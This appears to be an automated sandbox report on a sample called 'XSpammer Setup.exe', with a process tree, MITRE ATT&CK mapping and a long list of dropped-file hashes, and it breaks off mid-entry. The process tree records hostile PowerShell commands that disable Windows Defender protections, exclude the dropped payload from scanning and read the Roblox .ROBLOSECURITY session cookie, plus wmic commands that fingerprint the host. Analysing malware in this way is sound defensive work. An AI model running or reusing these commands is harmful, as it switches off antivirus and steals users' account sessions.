C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5404

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap2590:90:7zEvent24868
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5756

C:\Users\Admin\Downloads\XSpammer Setup.exe
"C:\Users\Admin\Downloads\XSpammer Setup.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
PID:3064
- C:\Users\Admin\AppData\Local\Temp\Vofcecisbnvyq.exe
  "C:\Users\Admin\AppData\Local\Temp\Vofcecisbnvyq.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1792
- C:\Users\Admin\AppData\Local\Temp\Qwryfbmksj.exe
  "C:\Users\Admin\AppData\Local\Temp\Qwryfbmksj.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5312
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3440
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Qwryfbmksj.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5992
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5980
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5236
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2108
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3272
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:3920
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:1476
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2876
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:5220

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2860

C:\Users\Admin\AppData\Local\Programs\XSpammer\XSpammer.exe
"C:\Users\Admin\AppData\Local\Programs\XSpammer\XSpammer.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:5096
- C:\Users\Admin\AppData\Local\Programs\XSpammer\XSpammer.exe
  "C:\Users\Admin\AppData\Local\Programs\XSpammer\XSpammer.exe" --type=gpu-process --field-trial-handle=1564,5366388912168346946,12529785655891292889,131072 --enable-features=WebComponentsV0Enabled --disable-features=CertVerifierService,CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1572 /prefetch:2
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:3092
- C:\Users\Admin\AppData\Local\Programs\XSpammer\XSpammer.exe
  "C:\Users\Admin\AppData\Local\Programs\XSpammer\XSpammer.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1564,5366388912168346946,12529785655891292889,131072 --enable-features=WebComponentsV0Enabled --disable-features=CertVerifierService,CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2088 /prefetch:8
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  PID:3276
- C:\Users\Admin\AppData\Local\Programs\XSpammer\XSpammer.exe
  "C:\Users\Admin\AppData\Local\Programs\XSpammer\XSpammer.exe" --type=renderer --field-trial-handle=1564,5366388912168346946,12529785655891292889,131072 --enable-features=WebComponentsV0Enabled --disable-features=CertVerifierService,CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --lang=en-US --app-path="C:\Users\Admin\AppData\Local\Programs\XSpammer\resources\app.asar" --no-sandbox --no-zygote --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2204 /prefetch:1
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  PID:1700

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
PID:3088

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5740

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
PID:4452

C:\Users\Admin\AppData\Local\Programs\XSpammer\XSpammer.exe
"C:\Users\Admin\AppData\Local\Programs\XSpammer\XSpammer.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:5412
- C:\Users\Admin\AppData\Local\Programs\XSpammer\XSpammer.exe
  "C:\Users\Admin\AppData\Local\Programs\XSpammer\XSpammer.exe" --type=gpu-process --field-trial-handle=1576,10576136548469037425,17028952252827030838,131072 --enable-features=WebComponentsV0Enabled --disable-features=CertVerifierService,CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1584 /prefetch:2
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:4948
- C:\Users\Admin\AppData\Local\Programs\XSpammer\XSpammer.exe
  "C:\Users\Admin\AppData\Local\Programs\XSpammer\XSpammer.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1576,10576136548469037425,17028952252827030838,131072 --enable-features=WebComponentsV0Enabled --disable-features=CertVerifierService,CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2124 /prefetch:8
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:1140
- C:\Users\Admin\AppData\Local\Programs\XSpammer\XSpammer.exe
  "C:\Users\Admin\AppData\Local\Programs\XSpammer\XSpammer.exe" --type=renderer --field-trial-handle=1576,10576136548469037425,17028952252827030838,131072 --enable-features=WebComponentsV0Enabled --disable-features=CertVerifierService,CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --lang=en-US --app-path="C:\Users\Admin\AppData\Local\Programs\XSpammer\resources\app.asar" --no-sandbox --no-zygote --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2288 /prefetch:1
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - Checks processor information in registry
  PID:4992
- C:\Users\Admin\AppData\Local\Programs\XSpammer\XSpammer.exe
  "C:\Users\Admin\AppData\Local\Programs\XSpammer\XSpammer.exe" --type=gpu-process --field-trial-handle=1576,10576136548469037425,17028952252827030838,131072 --enable-features=WebComponentsV0Enabled --disable-features=CertVerifierService,CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2464 /prefetch:2
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:716

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2256

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
1⤵
PID:3436

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
1⤵
PID:2480

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
PID:1484

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:1924

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
cff358b013d6f9f633bc1587f6f54ffa

SHA1
6cb7852e096be24695ff1bc213abde42d35bb376

SHA256
39205cdf989e3a86822b3f473c5fc223d7290b98c2a3fb7f75e366fc8e3ecbe9

SHA512
8831c223a1f0cf5f71fa851cdd82f4a9f03e5f267513e05b936756c116997f749ffa563623b4724de921d049de34a8f277cc539f58997cda4d178ea205be2259

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
dc629a750e345390344524fe0ea7dcd7

SHA1
5f9f00a358caaef0321707c4f6f38d52bd7e0399

SHA256
38b634f3fedcf2a9dc3280aa76bd1ea93e192200b8a48904664fac5c9944636a

SHA512
2a941fe90b748d0326e011258fa9b494dc2f47ac047767455ed16a41d523f04370f818316503a5bad0ff5c5699e92a0aaf3952748b09287c5328354bfa6cc902

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
807419ca9a4734feaf8d8563a003b048

SHA1
a723c7d60a65886ffa068711f1e900ccc85922a6

SHA256
aa10bf07b0d265bed28f2a475f3564d8ddb5e4d4ffee0ab6f3a0cc564907b631

SHA512
f10d496ae75db5ba412bd9f17bf0c7da7632db92a3fabf7f24071e40f5759c6a875ad8f3a72bad149da58b3da3b816077df125d0d9f3544adba68c66353d206c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
186B

MD5
859cf9cd77c9a6bd5b0af56f08fb5128

SHA1
d62387a78e8a1643ba3117187479da14bce1b65c

SHA256
d16c0bd72e9deb73d2e3a40eb21ac668477363c33e58765884b1663324a4eb05

SHA512
e60f5d7000507794a20316c7110fbee3f1d9b02efdba877bec150d5d63939eff3aa9fbba758709a8094c65a083b158840563a8e8399b64e16a077d12a1cb8fed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
77a8a732d13a057bb9e7a7926f09cc22

SHA1
330d60e7310ccb93fd682f0f53c8db3cc7bbf6a6

SHA256
655d851cb5eb6250ffffa40900c24c2884465afde645dedb710015efa93b6690

SHA512
5160745581a2d37cca9f290f44d57bd26252c2baeacaf0f12f49964e5be09a9d270f097403e7de2c598caf2eca33e1b092873d963ba2586f34da89966f0bd7b6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
8b714462ef56fe98e00dee46902845f5

SHA1
1238dd89e4f3945b8467c83a9ee3bd6166ee362a

SHA256
bff57e47f51597037b9e20d69a32ae523b5c3727cba19c844cb6bb52f22f6ccf

SHA512
81a9b3d6cb8e99ce90be8c33126c8a256af4f3b9dd31eb9dd167711ffd197b1c54a57f7985ec3672dfbea901254eeb79c08f915c53a658cc46d029cd0db540c9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
d709c78db1d031a01342eb042848a64d

SHA1
f4bdc84630742029e24456c040603503909ace12

SHA256
8fc3be4941d862b6e70275faca0703597ee2964cc6cb4688cf8f4fd164de7153

SHA512
7fe682308b73bd60845c18230416ff07019ac636b2a681dea806995705a1b87ff3ddcf3e1ae29d90bff47738bcd44ac91a70152e407e4af72cc63c55c68b4aee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
5b25e402460b74d2c1a449da0491399a

SHA1
22a9e29a635edeffca70d9e1785ad059d8c5ec12

SHA256
587ed5008a0edfc878c4e72ddc9d4455fae28151db5dcf6833bf38f0a41caf6b

SHA512
2c377e8cd9154788e51a23872ceac6bdbbc5ed7ba4bb9ce81874242ccd3bbf23c62e8ab949b3065fe5eb49b977c94a598baa277de07ea62170da3259cc4e9ab1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
77344895bf506de8b593ee039cde56c7

SHA1
cd3b8541186eabef0c9c4264fd79373e09a28293

SHA256
04bbc636c971ee601dc8b1e343aa41ebce0dc1f77238e2d755e5b4211dd6e319

SHA512
a2d1f5db8a1ced99a67aecf105850dfec96cb59686e1420d6c7584020e2e23d844e5884a8df8ec5df5a33f396b45bc6cc92f7bdc90798369007dc7efebeda1a8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
25baa9a3a71f9c18632619247f19500c

SHA1
945b0ac6b2c83d158da9c12bfdea5073e63ea79b

SHA256
5718432f11e27860b306b66360afab6629554e3a0439f79d09d3bf4dfeffe07c

SHA512
ae9cfa5e5ab553045e4e891119d91d0a19d7aa028e894effa40f91c3f2c27ecb8fac8596439820c0614193304f418d8d92072c1ebc6fc39fb84ded6786810497

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

Filesize
264KB

MD5
12fb6ccae6cd8f7004f32f6d08481cb6

SHA1
c0fa6e374c8e2542110aa2977d70f96a50efdbec

SHA256
d10bc630d41f54f0067123636b9e5ad437981ad8f1f34a5328bd8509f5efeeed

SHA512
6042480b28d0666e5043e2d898d33c6e73022b8e2f46119e60374a056daf7b95394bc64588d68f7edae8a58327d72d6c6afbe761d28b54274a44606e44014d5b

Download Submit
C:\Users\Admin\AppData\Local\Programs\XSpammer\XSpammer.exe

Filesize
125.0MB

MD5
123d82725f2fe084f2df4c7c12265777

SHA1
94bd38f170fe619777b5eb8cb2e1978ccc6efecf

SHA256
333c92f0ef14c88610341187b4f5ab54f9afe91c767d383e1578d6bc5706b32e

SHA512
10781fd04263d314b7d357e2d756656f643c2416a2de45e413b28dcd3781bd72d9fdf2ce253b4471c4679c314c4cee8f7ee63e7007418b24de96f765b9e143b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Qwryfbmksj.exe

Filesize
231KB

MD5
7b24133fac1c0f8fa176750179ca79e6

SHA1
ea7395ac0495825e6b716ad5e47185a5dc216b06

SHA256
789c7efc5d77506b6b6fd385eef6908b31254df042d922fda4302c72ff72b3f6

SHA512
337ebe224eabda1b4b4597628addf6810cd450bd795666a5642856943fc2588f6ed69d91323969a9eb3827859e99a981c54f3c0ce5eb2c7d6b2fdbd3fb26b060

Download Submit
C:\Users\Admin\AppData\Local\Temp\Vofcecisbnvyq.exe

Filesize
72.4MB

MD5
1945cc6063dc247fd43d24eabe1b7533

SHA1
d756893bc819e88de256f21bea88b8b752a275af

SHA256
ea8e830aee3ca762fa8d37597994acf261430d0ec3f393b1861e6e9d7ac3c552

SHA512
0631faf6474a96f30926784f21b9ad476ae67928028c1c68d36453e11460330b293f33280d8af117e05dda0b39f742d74a68f6d6d2dd1cee5d15f93e23201e78

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kvwel0ta.tam.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsw93FF.tmp\StdUtils.dll

Filesize
100KB

MD5
c6a6e03f77c313b267498515488c5740

SHA1
3d49fc2784b9450962ed6b82b46e9c3c957d7c15

SHA256
b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e

SHA512
9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsw93FF.tmp\System.dll

Filesize
12KB

MD5
0d7ad4f45dc6f5aa87f606d0331c6901

SHA1
48df0911f0484cbe2a8cdd5362140b63c41ee457

SHA256
3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca

SHA512
c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsw93FF.tmp\UAC.dll

Filesize
14KB

MD5
adb29e6b186daa765dc750128649b63d

SHA1
160cbdc4cb0ac2c142d361df138c537aa7e708c9

SHA256
2f7f8fc05dc4fd0d5cda501b47e4433357e887bbfed7292c028d99c73b52dc08

SHA512
b28adcccf0c33660fecd6f95f28f11f793dc9988582187617b4c113fb4e6fdad4cf7694cd8c0300a477e63536456894d119741a940dda09b7df3ff0087a7eada

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsw93FF.tmp\WinShell.dll

Filesize
3KB

MD5
1cc7c37b7e0c8cd8bf04b6cc283e1e56

SHA1
0b9519763be6625bd5abce175dcc59c96d100d4c

SHA256
9be85b986ea66a6997dde658abe82b3147ed2a1a3dcb784bb5176f41d22815a6

SHA512
7acf7f8e68aa6066b59ca9f2ae2e67997e6b347bc08eb788d2a119b3295c844b5b9606757168e8d2fbd61c2cda367bf80e9e48c9a52c28d5a7a00464bfd2048f

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsw93FF.tmp\nsDialogs.dll

Filesize
9KB

MD5
466179e1c8ee8a1ff5e4427dbb6c4a01

SHA1
eb607467009074278e4bd50c7eab400e95ae48f7

SHA256
1e40211af65923c2f4fd02ce021458a7745d28e2f383835e3015e96575632172

SHA512
7508a29c722d45297bfb090c8eb49bd1560ef7d4b35413f16a8aed62d3b1030a93d001a09de98c2b9fea9acf062dc99a7278786f4ece222e7436b261d14ca817

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsw93FF.tmp\nsProcess.dll

Filesize
4KB

MD5
f0438a894f3a7e01a4aae8d1b5dd0289

SHA1
b058e3fcfb7b550041da16bf10d8837024c38bf6

SHA256
30c6c3dd3cc7fcea6e6081ce821adc7b2888542dae30bf00e881c0a105eb4d11

SHA512
f91fcea19cbddf8086affcb63fe599dc2b36351fc81ac144f58a80a524043ddeaa3943f36c86ebae45dd82e8faf622ea7b7c9b776e74c54b93df2963cfe66cc7

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsw93FF.tmp\nsis7z.dll

Filesize
424KB

MD5
80e44ce4895304c6a3a831310fbf8cd0

SHA1
36bd49ae21c460be5753a904b4501f1abca53508

SHA256
b393f05e8ff919ef071181050e1873c9a776e1a0ae8329aefff7007d0cadf592

SHA512
c8ba7b1f9113ead23e993e74a48c4427ae3562c1f6d9910b2bbe6806c9107cf7d94bc7d204613e4743d0cd869e00dafd4fb54aad1e8adb69c553f3b9e5bc64df

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Roaming\XSpammer\9d365eae-e50d-438e-a8bc-a77f0eef5eac.tmp

Filesize
86B

MD5
d11dedf80b85d8d9be3fec6bb292f64b

SHA1
aab8783454819cd66ddf7871e887abdba138aef3

SHA256
8029940de92ae596278912bbbd6387d65f4e849d3c136287a1233f525d189c67

SHA512
6b7ec1ca5189124e0d136f561ca7f12a4653633e2d9452d290e658dfe545acf6600cc9496794757a43f95c91705e9549ef681d4cc9e035738b03a18bdc2e25f0

Download Submit
C:\Users\Admin\AppData\Roaming\XSpammer\GPUCache\data_2

Filesize
8KB

MD5
0962291d6d367570bee5454721c17e11

SHA1
59d10a893ef321a706a9255176761366115bedcb

SHA256
ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7

SHA512
f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

Download Submit
C:\Users\Admin\AppData\Roaming\XSpammer\Network Persistent State

Filesize
188B

MD5
c5aaf170523a6627a889bb1e69137e67

SHA1
6b2fc79d37ee85634b00c52ecd795e9d1ee2bdf3

SHA256
32db68227150f833e41cd5907195c1f05637cac33fdfbf3fd8f9acbfb94dfe5a

SHA512
3712cdd5ba18a101810b6e6b24a300b0c13400315cfead2569660f4bfc977d2e8be9db6a6109ef9812043b549ff06c3f4aadfd71e5d65d21819ad7e05590fdc3

Download Submit
C:\Users\Admin\AppData\Roaming\XSpammer\Network Persistent State~RFe591ae1.TMP

Filesize
59B

MD5
2800881c775077e1c4b6e06bf4676de4

SHA1
2873631068c8b3b9495638c865915be822442c8b

SHA256
226eec4486509917aa336afebd6ff65777b75b65f1fb06891d2a857a9421a974

SHA512
e342407ab65cc68f1b3fd706cd0a37680a0864ffd30a6539730180ede2cdcd732cc97ae0b9ef7db12da5c0f83e429df0840dbf7596aca859a0301665e517377b

Download Submit
C:\Users\Admin\Desktop\CheckpointEdit.rar

Filesize
679KB

MD5
5b3bae338d4a83ccb3e5c3e9b6bce13a

SHA1
b8bddcd1357fb07249f9694d758365056777338e

SHA256
1ad8127022e6a8baaa7407258b574e6104b64462d3567755ddc520b4c2e3357b

SHA512
fb5787df5d2f942f5f49a6b20966fb48052e7305c6988a101eb5b460df83346efe8986bf372fc000e7dd65e76f06dc92fac380e1e7f6ae9f8b3a34d642423751

Download Submit
C:\Users\Admin\Desktop\ClearSelect.mpv2

Filesize
1.5MB

MD5
360bda749e23712b2bfdf18b7faf5535

SHA1
bc2e38ddfcb3fdd0d4e8c964cb5706471cac652e

SHA256
f5a70d378874860a5599cdd38d233332fe84a4b5b69e6bf5b5746ad75de3c4ea

SHA512
7fe7e2fba07e69f7d99dfeda06366664d4e3de66507430b1f887d62851f137ddc7feb0c8359d7358f6367e815513e2ed3f6c3191f920d82f4d7cd7cd27d4820f

Download Submit
C:\Users\Admin\Desktop\ConfirmRename.xls

Filesize
1.1MB

MD5
5b7f8c60a8474d4140ba70165c4e8c4d

SHA1
8db92327397bd062bc6946404922f13751ec9461

SHA256
3381fe5f5ed8e1e17273bc4486d8d3dd2805cbc8d0ab9bbe195b801bfeda0ef7

SHA512
9b09e2a4d7fd6c28b7e03aad12db9a272f078c466d7d94871f9214224dd0f8701312c6926d5375dc6e70da207aba49ac6e4249543f385b6722ab9d44bcaf5aba

Download Submit
C:\Users\Admin\Desktop\ConnectRegister.jfif

Filesize
400KB

MD5
c001f85aeeea5ab778ec9c868d3e6cc0

SHA1
342e2da93ce39cb561ebb4bd4a83f725eb60ac07

SHA256
5c422a5882207580ab17db4355355a8f03fb181c4949c9e4e65d0b6be4d4c7a1

SHA512
a6afba6d2cd75f8c1c1aa4c362e71d3335d0a44e0cbfaeb0be56f38add985815defeb05844700d3fbe8ac5851f9e0306fb64ffa6dcd76c31809df90734292b6e

Download Submit
C:\Users\Admin\Desktop\CopyResume.hta

Filesize
853KB

MD5
0dd2d31cb199295d13243340128f9d61

SHA1
d6f46110eff370e11d0a545780613f025cfaabef

SHA256
aa67e4826a2cecd8a721986dcbde8e26e064b58659e9b9f9d2b44425945cdc38

SHA512
2f4f09a58536bcd141cb69cd7e2e30a9dd08ca57b1d4f3327b913268ca69f376cacf847a7dd373643ba9e7bc4ebe3d2922141b53a6aa87074b1afc8c32e61b6e

Download Submit
C:\Users\Admin\Desktop\DisableLimit.mpg

Filesize
783KB

MD5
3db99252112b110ecef12bd197104b6c

SHA1
a37435e55f336b9fb8b4d0636801f08546367f19

SHA256
338e11d989bba2fa2cbe889a074fa1f7a5c348b006a24a2f7fed56d2f1c6aff6

SHA512
dffd6881962debb59c0fd60491d12446886e66e9625b6024b6203613336563e1a70bf2c7c9965c2a4657484eae9e01fb8c915fc2cc42a5f3f0376cb204341970

Download Submit
C:\Users\Admin\Desktop\DisableStep.ex_

Filesize
958KB

MD5
46143b71fb387deb20b5d96fa515004a

SHA1
a96a53c8461f49e6b58396beff9111a2dd5738f7

SHA256
6999c1a48dc970a82f07c852abe928a030fe9e43c4922185e7a8c6330d07b2f3

SHA512
20e047849f5e25abde00785bb0327d8730be212236da3feed8e714c9e7e3e43ca67f23560c86c22a3f44794bf8af0ee75b4168f3d91b2e8b4116e302f9c26ad3

Download Submit
C:\Users\Admin\Desktop\DismountRead.dotx

Filesize
714KB

MD5
a9eb769d0588db36d6b6bd77b2fc9e78

SHA1
60853fef0c747a4cd8ecdbb420d26a29e724b741

SHA256
